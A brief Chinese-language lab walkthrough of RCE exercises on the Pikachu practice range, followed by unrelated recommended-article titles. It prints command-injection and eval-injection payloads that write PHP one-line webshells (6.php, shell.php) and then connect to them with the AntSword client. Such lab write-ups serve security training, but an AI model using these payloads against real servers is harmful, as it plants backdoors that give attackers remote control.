Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
金立基胶粘5 分钟前
封口胶在包装行业中的重要性及其与糊盒胶的结合
大数据·安全
~木雨10 分钟前
Java 并发编程架构全景:并发层的五域设计 —— 线程模型、线程池隔离、并发安全到问题治理(全体系汇总)
java·安全·架构·线程池·并发编程·高并发架构
充电zcx24 分钟前
Linux:2:Linux下的基本指令
linux·运维·服务器
sungtv29 分钟前
桥梁钢箱梁施工安全生产动画怎么还原张拉作业风险
安全·安全生产动画
数安旭说31 分钟前
从“人治”到“平台化”:迪康端点安全一体化管理平台的任务协同实战
运维·数据安全·软件需求·企业管理·终端管理·终端安全·终端运维
数据知道33 分钟前
YARA 规则编写实战——从样本到检测规则
网络·安全·网络安全
handler0135 分钟前
【Linux】虚拟地址空间解析
linux·运维·c++·线程·进程·虚拟地址空间·虚拟地址
志栋智能37 分钟前
安全超自动化:实现安全策略动态调整的保障
网络·安全·自动化
明月_清风1 小时前
DeepSeek Harness 安全审计实录:四个 PoC 揭露的 Agent 运行时"信任危机"
后端·安全·agent
可视化运维管理爱好者1 小时前
机房工勘记录器分享
运维·网络·nvisual